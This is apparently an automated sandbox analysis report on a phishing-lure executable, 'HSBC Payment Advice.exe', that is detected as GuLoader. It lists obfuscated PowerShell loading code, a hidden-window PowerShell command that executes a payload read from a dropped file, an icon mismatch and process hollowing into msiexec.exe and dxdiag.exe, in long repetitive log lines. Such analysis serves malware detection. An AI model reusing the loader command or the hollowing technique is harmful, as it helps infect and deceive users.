    Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdbn source: powershell.exe, 00000002.00000002.91922466152.00000000072D7000.00000004.00000020.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Yara detected GuLoader
    Source: Yara matchFile source: 00000002.00000002.91928114130.0000000008F22000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Found suspicious powershell code related to unpacking or dynamic code loading
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Skybruddene $Elbowboardntragroupal $actinomorphy), (Bestyrelsesmdeers @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Preacknowledgments77 = [AppDomain]::C
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($bassiner)), $Georgist).DefineDynamicModule($Uflyttelig, $false).DefineType($Talks, $Ashy, [System.MulticastDelegate])$Folliculated.Def
    Suspicious powershell command line found
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion\tidsserier.Adj';$nijholt=$Finurligheden.SubString(56673,3);.$nijholt($Finurligheden) "
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion\tidsserier.Adj';$nijholt=$Finurligheden.SubString(56673,3);.$nijholt($Finurligheden) "Jump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_046486F8 push eax; mov dword ptr [esp], edx2_2_0464870C

    Hooking and other Techniques for Hiding and Protection

    barindex
    Icon mismatch, binary includes an icon from a different legit application in order to fool users
    Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (92).png
    Loading BitLocker PowerShell Module
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9936Jump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeAPI call chain: ExitProcess graph end nodegraph_0-3576
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_02E2D6E4 LdrInitializeThunk,2_2_02E2D6E4
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Sample uses process hollowing technique
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
